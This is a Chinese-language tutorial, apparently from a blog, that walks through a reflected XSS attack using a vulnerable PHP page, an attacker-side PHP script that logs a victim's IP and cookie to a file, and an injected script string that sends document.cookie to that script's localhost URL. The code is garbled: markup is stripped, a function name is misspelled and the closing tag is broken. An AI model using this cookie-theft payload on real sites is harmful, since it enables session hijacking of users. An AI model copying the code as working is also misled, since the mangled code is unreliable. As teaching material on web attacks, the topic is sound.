XSS跨站脚本攻击过程的讲解

跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。以下为能够演示器原理的完整样例:

1.角色分配

有XSS漏洞的网站
受害访问者。也就是浏览器
黑客的数据接受网站

2.源码实例

2.1漏洞网站

漏洞网站:http://localhost/xss.php


session_start();
?>


    
        XSS
    
    
        
"text" name="address" value=""/> "submit" value="submit" />

该网页把用户通过GET发送过来的表单数据,未经过处理直接写入返回的html流,这就是XSS漏洞所在

2.2黑客接受网站

接受网站的URL为http://localhost/xss_hacker.php


$victim = 'XSS得到的 cookie:'.$_SERVER['REMOTE_ADDR'].':'.$_GET['cookie'];
fill_put_contents('xss_victim.txt',$victim);
?>

把受害用户的IP地址和访问漏洞网站时使用的cookie,一起写入xss_victim.txt文件保存备用

2.3用户正常访问

用户使用浏览器访问网站。现在的网站一般都采用session+cookie来保存用户登录信息的。网站通过验证cookie来确实是否是合法已登录用户,所以cookie是敏感数据.

3.攻击过程

3.1黑客准备攻击字符串,构造攻击URL

黑客可以通过各种扫描工具或者人工输入来找到有XSS漏洞的网站URL,然后精心构造攻击字符串。对于本例来说构造出来的字符串为:

"/><script>window.open("http://localhost/xss_hacker.php?cookie="+document.cookie);script>
                    

你可能感兴趣的:(web安全)